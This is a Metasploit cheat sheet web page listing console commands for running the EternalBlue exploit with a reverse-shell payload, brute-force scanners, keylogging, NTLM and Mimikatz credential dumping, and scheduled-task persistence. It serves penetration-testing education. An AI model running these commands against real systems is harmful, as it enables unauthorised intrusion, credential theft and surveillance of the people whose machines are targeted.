← All Cheatsheets

exploitation

Metasploit Framework — Exploitation

Metasploit Framework — the world's most used penetration testing framework for exploit development and execution.

12 views Apr 2026 lazyhackers

msfconsole Basics (15)

msfconsole

Launch Metasploit console

start

msfconsole -q

Launch quietly (no banner)

start

msfdb init && msfconsole

Initialize database then launch

start db

search type:exploit platform:windows smb

Search for Windows SMB exploits

search

search cve:2017-0144

Search by CVE number

search cve

use exploit/windows/smb/ms17_010_eternalblue

Select EternalBlue exploit

use smb

info

Show info about selected module

info

show options

Show required options for module

options

show payloads

List compatible payloads

payloads

set RHOSTS 10.10.10.1

Set target host

options

set LHOST 10.10.14.1

Set attacker IP (for reverse shells)

options

set LPORT 4444

Set listener port

options

set payload windows/x64/meterpreter/reverse_tcp

Set Meterpreter payload

payload meterpreter

run

Execute the exploit

run

check

Check if target is vulnerable (non-intrusive)

check

Meterpreter Commands (19)

sysinfo

Get system information

meterpreter info

getuid

Get current user

meterpreter priv

getpid

Get current process ID

meterpreter

ps

List running processes

meterpreter process

migrate 1234

Migrate to process ID 1234

meterpreter process migrate

shell

Drop to OS shell

meterpreter shell

upload /local/file.exe C:\\Windows\\Temp\\file.exe

Upload file to target

meterpreter file

download C:\\Windows\\System32\\sam /tmp/

Download file from target

meterpreter file

hashdump

Dump local NTLM password hashes

meterpreter creds hashes

getsystem

Attempt privilege escalation to SYSTEM

meterpreter privesc

run post/windows/gather/smart_hashdump

Smart hashdump post module

meterpreter post hashes

run post/multi/recon/local_exploit_suggester

Find local privilege escalation exploits

meterpreter privesc

background

Background current session

meterpreter session

sessions -l

List all active sessions

sessions

sessions -i 1

Interact with session 1

sessions

keyscan_start && keyscan_dump

Start/dump keylogger

meterpreter keylog

screenshare

Live screen sharing from target

meterpreter screen

portfwd add -l 3389 -p 3389 -r 192.168.1.10

Port forward RDP through Meterpreter

meterpreter portfwd rdp

run post/windows/manage/enable_rdp

Enable RDP on Windows target

meterpreter rdp post

Auxiliary Modules (7)

use auxiliary/scanner/portscan/tcp

TCP port scanner

auxiliary portscan

use auxiliary/scanner/smb/smb_ms17_010

Scan for EternalBlue vulnerability

auxiliary smb scan

use auxiliary/scanner/ssh/ssh_login

SSH brute force login

auxiliary ssh bruteforce

use auxiliary/scanner/http/dir_scanner

HTTP directory scanner

auxiliary http dirs

use auxiliary/scanner/vnc/vnc_none_auth

Find VNC with no auth required

auxiliary vnc

use auxiliary/scanner/ftp/ftp_login

FTP brute force

auxiliary ftp bruteforce

use auxiliary/server/capture/http_ntlm

Capture NTLM hashes over HTTP

auxiliary capture ntlm

Post-Exploitation & Persistence (7)

run post/windows/gather/credentials/credential_collector

Collect all credentials on Windows

post creds

run post/multi/gather/env

Collect environment variables

post env

run post/windows/manage/persistence_exe STARTUP=SCHEDULER

Add persistence via scheduled task

post persistence

load kiwi

Load Mimikatz (kiwi) extension

meterpreter mimikatz kiwi

creds_all

Dump all credentials via kiwi

meterpreter kiwi creds

lsa_dump_sam

Dump SAM database via kiwi

meterpreter kiwi sam

lsa_dump_secrets

Dump LSA secrets via kiwi

meterpreter kiwi lsa